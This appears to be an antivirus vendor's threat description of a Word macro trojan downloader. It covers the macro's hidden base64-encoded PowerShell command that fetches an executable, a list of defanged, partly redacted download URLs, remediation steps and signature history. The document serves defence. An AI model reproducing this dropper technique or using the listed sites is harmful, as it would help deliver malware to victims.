VBA/Agent.MUV!tr.dldr
Analysis
VBA/Agent.MUV!tr.dldr is a generic detection for a trojan. Since this is a generic detection, malware that are detected as VBA/Agent.MUV!tr.dldr may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- It is a Microsoft Word macro.
- It creates a base64 encoded command and executes it via Powershell in hidden mode
- The Powershell script will attempt to connect to multiple sites to download a file called: 720.exe
- At the time this virus description is written (Jan. 14, 2020), the sites the malware connects to no longer supply the executable.
- The malware attempts to connect to the following sites to download the executable:
- hxxp://www.[REMOVED]-me.com/wp-admin/da5tfh48/
- hxxp://www.ovi[REMOVED].com/mgs1/1jk0225/
- hxxps://jasam[REMOVED].com/wp-content/gzv60154/
- hxxps://www.mary[REMOVED].com/wp-content/brand/zgkb6/
- hxxp://lua[REMOVED].org/calendar/7532946
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
FortiClient | |
FortiAPS | |
FortiAPU | |
FortiMail | |
FortiSandbox | |
FortiWeb | |
Web Application Firewall | |
FortiIsolator | |
FortiDeceptor | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2022-04-18 | 90.01507 | |
2021-08-24 | 88.00605 | |
2020-11-24 | 82.07300 | Sig Updated |
2020-11-24 | 82.06900 | Sig Updated |
2020-11-23 | 82.05300 | Sig Updated |
2020-11-17 | 81.90300 | Sig Updated |
2020-05-26 | 77.70500 | Sig Updated |
2019-11-27 | 73.37100 | Sig Updated |
2019-11-27 | 73.37000 | Sig Updated |
2019-11-26 | 73.35800 | Sig Updated |